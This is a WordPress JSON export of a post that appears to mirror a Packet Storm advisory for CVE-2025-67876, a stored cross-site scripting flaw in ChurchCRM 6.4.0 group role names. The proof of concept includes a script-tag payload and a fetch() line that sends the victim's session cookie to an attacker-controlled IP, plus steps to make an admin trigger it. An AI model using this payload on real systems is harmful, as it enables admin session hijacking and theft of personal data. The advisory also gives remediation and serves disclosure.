{"id":46297,"date":"2026-04-13T11:50:28","date_gmt":"2026-04-13T11:50:28","guid":{"rendered":"http:\/\/localhost\/?p=46297"},"modified":"2026-04-13T11:50:28","modified_gmt":"2026-04-13T11:50:28","slug":"churchcrm-640-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46297","title":{"rendered":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:46:41&#8243;,&#8221;description&#8221;:&#8221;ChurchCRM versions 6.4.0 and below suffer from persistent cross site scripting vulnerability in group role name assignment&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218768&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-67876&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-67876: ChurchCRM has Stored XSS in Group Role Name Leading to Admin Session Hijacking\\n    \\n    ## Overview\\n    \\n    | Field | Details |\\n    |&#8212;|&#8212;|\\n    | **CVE ID** | [CVE-2025-67876](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-67876) |\\n    | **Severity** | CRITICAL |\\n    | **Advisory** | [View Advisory](https:\/\/github.com\/ChurchCRM\/CRM\/security\/advisories\/GHSA-j9gv-26c7-3qrh) |\\n    | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n    \\n    ## Affected Products\\n    \\n    &#8211; **ChurchCRM\/CRM**\\n    \\n    \\n    \\n    ## Details\\n    \\n    ### Summary\\n    A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM that allows a low-privilege user with the \u201cManage Groups\u201d permission to inject persistent JavaScript into group role names. The payload is saved in the database and executed whenever any user (including administrators) views a page that displays that role, such as GroupView.php or PersonView.php. This allows full session hijacking and account takeover.\\n    \\n    ### Details\\n    The root cause is a lack of input validation and output encoding in the handling of group role names.\\n    \\n    When editing a group in GroupEditor.php, the user can modify the role names. The application does not sanitize the input (e.g., no strip_tags, htmlspecialchars, or server-side validation). The value is stored in the list_lst database table.\\n    \\n    Later, the stored value is injected directly into HTML without escaping:\\n    &#8211; In GroupView.php, group roles appear inside table cells wrapped in \\u003cspan\\u003e.\\n    &#8211; In PersonView.php, the user&#8217;s assigned roles are displayed under \u201cAssigned Groups\u201d.\\n    Because no escaping is applied, any HTML or JavaScript stored in the role name is executed in the victim\u2019s browser.\\n    \\n    A low-privilege user (with Manage Groups) can therefore escalate privileges to full administrator by injecting JavaScript into a role and assigning that role to an admin.\\n    \\n    ### PoC\\n    \\n    #### Phase 1 &#8211; Attacker setup\\n    Create x.js on attacker-controlled machine:\\n    \\n    `fetch(&#8216;http:\/\/172.20.0.1:8000\/log?cookie=&#8217; + encodeURIComponent(document.cookie));`\\n    \\n    Serve the file:\\n    \\n    `python3 -m http.server 800`\\n    \\n    #### Phase 2 &#8211; Inject the XSS payload\\n    1. Log in as a user with Manage Groups permission.\\n    \\u003cimg width=\\&#8221;2301\\&#8221; height=\\&#8221;833\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/f5e31c57-033a-46e0-b9fb-efa8e2d95440\\&#8221; \/\\u003e\\n    \\n    2. Navigate to:\\n       Groups \u2192 List Groups \u2192 select any group \u2192 Settings.\\n    \\n    3. In the \u201cGroup Roles\u201d section, edit an existing role or create a new one.\\n    4. Insert malicious payload:\\n    \\n    `\\&#8221;\\u003e\\u003cscript src=\/\/172.20.0.1:800\/x.js\\u003e\\u003c\/script\\u003e`\\n    \\n    \\u003cimg width=\\&#8221;1901\\&#8221; height=\\&#8221;904\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/6b98c5cc-2059-416c-8083-279922637ebf\\&#8221; \/\\u003e\\n    \\n    \\n    In the Group Roles list, click Default next to the role containing your injected XSS payload.\\n    This ensures that the malicious role will automatically be assigned to any user added to the group, increasing the likelihood that an administrator will trigger the XSS when viewing their profile.\\n    \\u003cimg width=\\&#8221;1893\\&#8221; height=\\&#8221;371\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/97f973e3-839c-4930-b98e-d7a22653e8f0\\&#8221; \/\\u003e\\n    Click Delete next to the previous default role, typically \\&#8221;Member\\&#8221;.\\n    Removing the clean default role forces the system to use the XSS-injected role for all future assignments, guaranteeing execution when the victim views any page that displays their assigned role.\\n    \\u003cimg width=\\&#8221;1892\\&#8221; height=\\&#8221;343\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/05732ac0-1ff0-4d0b-8e6a-e709037a4005\\&#8221; \/\\u003e\\n    \\n    5. Save the role name.\\n    \\u003cimg width=\\&#8221;1718\\&#8221; height=\\&#8221;595\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/576e31ab-6d1d-4b3e-a6e0-2724d37d06b0\\&#8221; \/\\u003e\\n    \\n    \\n    #### Phase 3 &#8211; Assign the malicious role to a victim\\n    1. Go to the Group View page.\\n    2. Add any user as a group member (e.g., Church Admin).\\n    \\u003cimg width=\\&#8221;945\\&#8221; height=\\&#8221;951\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/9d7773cf-fee0-4f22-943b-460aa189b993\\&#8221; \/\\u003e\\n    \\n    3. Select the malicious role from the dropdown.\\n    4. Save the assignment.\\n    \\u003cimg width=\\&#8221;945\\&#8221; height=\\&#8221;548\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/7f058565-7289-4362-8bf0-f4ad7cd83ad1\\&#8221; \/\\u003e\\n    \\n    #### Phase 4 &#8211; Execution of XSS\\n    When the victim (admin) visits:\\n    &#8211; Their user profile: PersonView.php\\n    \\u003cimg width=\\&#8221;1721\\&#8221; height=\\&#8221;529\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/c41d159e-04fb-469d-bbdd-acacc58c9174\\&#8221; \/\\u003e\\n    \\n    &#8211; The group view page: GroupView.php\\n    \\n    The stored JavaScript executes immediately.\\n    \\n    On the attacker server, incoming requests will appear:\\n    \\u003cimg width=\\&#8221;1722\\&#8221; height=\\&#8221;558\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/c07cdc46-cb06-4a74-9481-b31391c43efe\\&#8221; \/\\u003e\\n    \\n    \\u003cimg width=\\&#8221;945\\&#8221; height=\\&#8221;422\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/c3bd73ce-2416-4841-9687-4a1d498ab73b\\&#8221; \/\\u003e\\n    \\n    This confirms successful account takeover.\\n    \\n    ### Impact\\n    &#8211; Stored XSS\\n    &#8211; Full administrator session hijacking\\n    &#8211; Privilege escalation from low-permission user to full system admin\\n    &#8211; Exposure of all sensitive personal data stored in ChurchCRM\\n    \\n    \\n    ### CWE\\n    CWE-79: Improper Neutralization of Input During Web Page Generation (\u2018Cross-site Scripting\u2019)\\n    \\n    ### Recommendation\\n    &#8211; Implement output encoding (htmlspecialchars) for all role name renderings.\\n    &#8211; Validate and sanitize role names on server-side.\\n    &#8211; Review other list-based editable fields for similar vulnerabilities.\\n    &#8211; Consider use of a central escaping library or templating engine.\\n    \\n    ## References\\n    \\n    &#8211; https:\/\/github.com\/ChurchCRM\/CRM\/security\/advisories\/GHSA-j9gv-26c7-3qrh\\n    \\n    \\n    ## Disclaimer\\n    \\n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218768&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.3,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:P\/VC:H\/SC:H\/VI:H\/SI:H\/VA:L\/SA:L&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218768\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:46:41&#8243;,&#8221;description&#8221;:&#8221;ChurchCRM versions 6.4.0 and below suffer from persistent cross site scripting vulnerability in group role name assignment&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218768&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-67876&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-67876: ChurchCRM has&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-46297","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46297\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:46:41&#8243;,&#8221;description&#8221;:&#8221;ChurchCRM versions 6.4.0 and below suffer from persistent cross site scripting vulnerability in group role name assignment&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218768&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-67876&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-67876: ChurchCRM has...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46297\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:28+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768\",\"datePublished\":\"2026-04-13T11:50:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\"},\"wordCount\":1126,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46297#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\",\"name\":\"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:28+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46297\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46297#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46297","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:46:41&#8243;,&#8221;description&#8221;:&#8221;ChurchCRM versions 6.4.0 and below suffer from persistent cross site scripting vulnerability in group role name assignment&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218768&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-67876&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-67876: ChurchCRM has...","og_url":"https:\/\/zero.redgem.net\/?p=46297","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:28+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46297#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46297"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768","datePublished":"2026-04-13T11:50:28+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46297"},"wordCount":1126,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46297#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46297","url":"https:\/\/zero.redgem.net\/?p=46297","name":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:28+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46297#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46297"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46297#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 ChurchCRM 6.4.0 Cross Site Scripting_PACKETSTORM:218768"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46297","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46297"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46297\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46297"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46297"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46297"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}